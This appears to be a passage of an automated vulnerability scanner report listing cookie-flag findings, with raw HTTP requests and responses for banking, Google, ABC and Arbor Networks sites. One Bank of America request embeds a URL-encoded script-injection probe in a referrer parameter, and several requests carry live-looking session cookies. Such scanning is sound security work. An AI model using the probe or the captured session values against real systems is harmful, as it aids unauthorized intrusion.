ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNjA1MzY0MzY4LjMwMTI2NDkyAAAAAAAFAAAAtXsAAGwfLU1MHy1N4LYAANfxQk3H8UJNZuAAALAkRE2vJERNoPEAAIycRU2MnEVND6gAANjTSU3Y00lNBQAAAF4zAABsHy1NTB8tTQtFAADX8UJNx/FCTUtLAACwJERNryRETWpLAACMnEVNjJxFTcJBAADY00lN2NNJTQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /meta HTTP/1.1 Host: stg.xp1.ru4.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /meta HTTP/1.1 Host: stg.xp1.ru4.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /i?siteID=429&ts=1296684340039&location=http%3A%2F%2Fwww.bankofamerica.com%2Ffindit%2Ferror.cgi%3FBOA_0020%3D20110202%3A0%3AO%3A5067fc0c-5451-405a-bffc3c21dd627de9%26state%3Dfalse%26BA_0021%3Dfalse&tagv=4.3&tz=-360&r=http%3A%2F%2Fwww.bankofamerica.com%2Fvehicle_and_personal_loans544ce%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E45ae18a6011%2Findex.cfm&title=Bank%20of%20America%20%7C%20Please%20Try%20Again&cd=16&ah=1156&aw=1920&sh=1200&sw=1920&pd=16 HTTP/1.1 Host: tc.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica.com/findit/error.cgi Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; throttle_value=21
Response
HTTP/1.1 200 OK Cache-control: no-cache, private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Date: Wed, 02 Feb 2011 22:04:41 GMT Last-Modified: Wed, 02 Feb 2011 22:04:41 GMT P3P: policyref="http://www.touchclarity.com/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR STP UNI PUR COM NAV INT STA PRE" Set-Cookie: TCID=0007ae71-9ad3-3b5c-9719-884700000028;path=/;domain=bankofamerica.com;expires=Sat, 02-Feb-2013 22:04:41 GMT; Connection: Keep-Alive Content-Length: 43 Content-Type: image/gif Set-Cookie: NSC_CbolPgBnfsjdb=445b32097852;expires=Thu, 03-Feb-11 02:04:42 GMT;path=/;domain=bankofamerica.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /c?siteid=429&ccID=BOA_HOME_SIGNON_SERVICE_01&ccID=BOA_HOME_SIGNON_SERVICE_02&ccID=BOA_HOME_SIGNON_SERVICE_03&ccID=BOA_HOME_SIGNON_HERO&location=https%3A%2F%2Fwww.bankofamerica.com%2Fhomepage%2Foverview.go%3FBOA_0020%3D999%26tc_lang%3Den_US%26state%3Dnull%26BA_0021%3Dnull%26BOA_HPR%3Dnull HTTP/1.1 Host: tc.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-control: no-cache, private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Date: Wed, 02 Feb 2011 22:02:37 GMT Last-Modified: Wed, 02 Feb 2011 22:02:37 GMT P3P: policyref="http://www.touchclarity.com/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR STP UNI PUR COM NAV INT STA PRE" Set-Cookie: TCID=0007ae71-99a3-d958-8d17-88470000005a;path=/;domain=bankofamerica.com;expires=Sat, 02-Feb-2013 22:02:37 GMT; Connection: Keep-Alive Content-Length: 563 Content-Type: text/javascript; charset=ISO-8859-1 Set-Cookie: NSC_CbolPgBnfsjdb=445b32097852;expires=Thu, 03-Feb-11 02:02:38 GMT;path=/;domain=bankofamerica.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: translate.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:05:04 GMT Expires: Thu, 03 Feb 2011 01:05:04 GMT Cache-Control: private, max-age=86400 Content-Type: text/html; charset=UTF-8 Content-Language: en Set-Cookie: PREF=ID=1bec15895da74ab0:TM=1296695104:LM=1296695104:S=GaVtpWsLtBVoNxSV; expires=Sat, 02-Feb-2013 01:05:04 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: translation X-XSS-Protection: 1; mode=block Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /translate_t?q=ipboard+software&um=1&ie=UTF-8&sa=N&hl=en&tab=wT HTTP/1.1 Host: translate.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:05:02 GMT Expires: Thu, 03 Feb 2011 01:05:02 GMT Cache-Control: private, max-age=86400 Content-Type: text/html; charset=UTF-8 Content-Language: en Set-Cookie: PREF=ID=25ad30bb14812802:TM=1296695102:LM=1296695102:S=SmhVQvsJtj0-g9k_; expires=Sat, 02-Feb-2013 01:05:02 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: translation X-XSS-Protection: 1; mode=block Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?country=us&ep=v_gg_new&akamai=true HTTP/1.1 Host: usa.visa.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /HG?hc=&hb=DM550608DPBR&cd=1&hv=6&n=/Citi+Home&con=&vcon=/CBOL/Home&tt=auto&ja=y&dt=16&zo=360&lm=1296102623000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&vpc=HBX0200u&vjs=HBX0201.03u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=1,-2&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&ttt=lid,lpos&ra=&pu=&rf=bookmark&pl=Chrome%20PDF%20Viewer%3AGoogle%20Gears%200.5.33.0%3AShockwave%20Flash%3AJava%20Deployment%20Toolkit%206.0.230.5%3AJava%28TM%29%20Platform%20SE%206%20U23%3AWPI%20Detector%201.1%3AGoogle%20Update%3ASilverlight%20Plug-In%3ADefault%20Plug-in%3A&lv.id=Header_Open%20an%20Account,Header_Find%20Citi%20Locations,Header_Search,Header_Help,Header_Contact%20Us,Header_Security,Header_Privacy,Header_Citi.com,PublicMenu_Banking%20Overview,PublicMenu_Checking,PublicMenu_Savings,PublicMenu_Certificates%20of%20Deposit%28CDs%29,PublicMenu_IRAs%20And%20IRA%20Rollovers,&lv.pos=,,,,,,,,,,,,,&hid=0.46637816983275115 HTTP/1.1 Host: vendorweb.citibank.com Proxy-Connection: keep-alive Referer: http://www.citi.com/domain/home.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily Date: Wed, 02 Feb 2011 21:59:59 GMT Server: Hitbox Gateway 9.3.6-rc1 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM" Set-Cookie: CTG=1296683999; path=/; domain=vendorweb.citibank.com; expires=Wed, 09-Feb-2011 21:59:59 GMT; max-age=604800 nnCoection: close Pragma: no-cache Cache-Control: max-age=0, private, proxy-revalidate Expires: Wed, 02 Feb 2011 22:00:00 GMT Location: http://vendorweb.citibank.com/HGct?hc=&hb=DM550608DPBR&cd=1&hv=6&n=/Citi+Home&con=&vcon=/CBOL/Home&tt=auto&ja=y&dt=16&zo=360&lm=1296102623000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&vpc=HBX0200u&vjs=HBX0201.03u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=1,-2&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&ttt=lid,lpos&ra=&pu=&rf=bookmark&pl=Chrome%20PDF%20Viewer%3AGoogle%20Gears%200.5.33.0%3AShockwave%20Flash%3AJava%20Deployment%20Toolkit%206.0.230.5%3AJava%28TM%29%20Platform%20SE%206%20U23%3AWPI%20Detector%201.1%3AGoogle%20Update%3ASilverlight%20Plug-In%3ADefault%20Plug-in%3A&lv.id=Header_Open%20an%20Account,Header_Find%20Citi%20Locations,Header_Search,Header_Help,Header_Contact%20Us,Header_Security,Header_Privacy,Header_Citi.com,PublicMenu_Banking%20Overview,PublicMenu_Checking,PublicMenu_Savings,PublicMenu_Certificates%20of%20Deposit%28CDs%29,PublicMenu_IRAs%20And%20IRA%20Rollovers,&lv.pos=,,,,,,,,,,,,,&hid=0.46637816983275115 Content-Type: image/gif Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /HGct?hc=&hb=DM550608DPBR&cd=1&hv=6&n=/Citi+Home&con=&vcon=/CBOL/Home&tt=auto&ja=y&dt=16&zo=360&lm=1296102623000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&vpc=HBX0200u&vjs=HBX0201.03u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=1,-2&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&ttt=lid,lpos&ra=&pu=&rf=bookmark&pl=Chrome%20PDF%20Viewer%3AGoogle%20Gears%200.5.33.0%3AShockwave%20Flash%3AJava%20Deployment%20Toolkit%206.0.230.5%3AJava%28TM%29%20Platform%20SE%206%20U23%3AWPI%20Detector%201.1%3AGoogle%20Update%3ASilverlight%20Plug-In%3ADefault%20Plug-in%3A&lv.id=Header_Open%20an%20Account,Header_Find%20Citi%20Locations,Header_Search,Header_Help,Header_Contact%20Us,Header_Security,Header_Privacy,Header_Citi.com,PublicMenu_Banking%20Overview,PublicMenu_Checking,PublicMenu_Savings,PublicMenu_Certificates%20of%20Deposit%28CDs%29,PublicMenu_IRAs%20And%20IRA%20Rollovers,&lv.pos=,,,,,,,,,,,,,&hid=0.46637816983275115 HTTP/1.1 Host: vendorweb.citibank.com Proxy-Connection: keep-alive Referer: http://www.citi.com/domain/home.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CTG=1296683999
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:00:00 GMT Server: Hitbox Gateway 9.3.6-rc1 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM" Set-Cookie: WSS_GW=V1z%B^eeiCrrr; path=/; domain=vendorweb.citibank.com; expires=Thu, 02-Feb-2012 22:00:00 GMT; max-age=31536000 Set-Cookie: DM550608DPBRV6=V1rrrrr"rz%B^eeiCrrr%^re^Cz%zrzr"%B^eeiCrrrz%B^eeiCrrr"%B^eeiCrrr"%B^eeiCrrr%^re^C"rz]%6%B^eeiCrrr6%z(xB$5><0xB$':maxB$52f2xBr':maz7}z)O:ma6r"OuKr6%XzA65><06':ma652f2H':mazu::dmIhd; path=/; domain=vendorweb.citibank.com; expires=Thu, 02-Feb-2012 22:00:00 GMT; max-age=31536000 Set-Cookie: CTG=1296684000; path=/; domain=vendorweb.citibank.com; expires=Wed, 09-Feb-2011 22:00:00 GMT; max-age=604800 nnCoection: close Pragma: no-cache Vary: * Cache-Control: no-cache, private, must-revalidate Expires: Wed, 02 Feb 2011 22:00:01 GMT Content-Type: image/gif Content-Length: 43
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: video.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Date: Thu, 03 Feb 2011 01:05:06 GMT Expires: Thu, 03 Feb 2011 01:05:06 GMT Cache-Control: private, max-age=0 Set-Cookie: PREF=ID=451bdac0aa428edb:TM=1296695106:LM=1296695106:S=qUfuqTtbKJhEKHvk; expires=Sat, 02-Feb-2013 01:05:06 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: VSFE_1.0 X-XSS-Protection: 1; mode=block Connection: close
<!doctype html> <meta content="text/html; charset=UTF-8" http-equiv=content-type> <meta content="Search millions of videos from across the web." name=description> <title>Google Videos</title> <script> ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/stories/2011/01/20/3117032.htm HTTP/1.1 Host: www.abc.net.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Cache-Control: max-age=300 Expires: Thu, 03 Feb 2011 01:10:09 GMT Date: Thu, 03 Feb 2011 01:05:09 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: ABCGuestID=24.143.206.110.73161296695109607; expires=Thu, 03-Feb-2011 01:35:09 GMT; path=/; domain=abc.net.au Content-Length: 41425
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" xmlns="http://www.w3.org/1999/xht ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rural/news/content/201102/s3126694.htm HTTP/1.1 Host: www.abc.net.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Cache-Control: max-age=300 Expires: Thu, 03 Feb 2011 01:10:08 GMT Date: Thu, 03 Feb 2011 01:05:08 GMT Content-Length: 10862 Connection: close Set-Cookie: ABCGuestID=24.143.206.110.73161296695108706; expires=Thu, 03-Feb-2011 01:35:08 GMT; path=/; domain=abc.net.au
<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd"> <html> <head>
<title>Tuna industry seeks lift in quotas, after boom se ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.arbornetworks.com Proxy-Connection: keep-alive Referer: http://www.arbornetworks.com/report Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: e411486dda3a9a212ec0bba8fd7ed343=-; mbfcookie[lang]=en; PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; __utmc=186398841; __utmb=186398841.1.10.1296689848
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cleanpipes HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cn/865.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cn/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /contact HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /de/5.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /de/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /deeppacketinspection HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/9.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/about-arbor-networks-a-leader-in-network-monitoring-and-security-solutions.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/arbor-in-action-global-network-security-solution-resources.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/arbor-networks-sixth-annual-worldwide-infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/arbor-powers-continent-8-technologies-ddos-mitigation-service.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/asert-arbor-security-engineering-response-team-2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/atlas-global-network-threat-analysis-460.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en/channel-partners-3.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
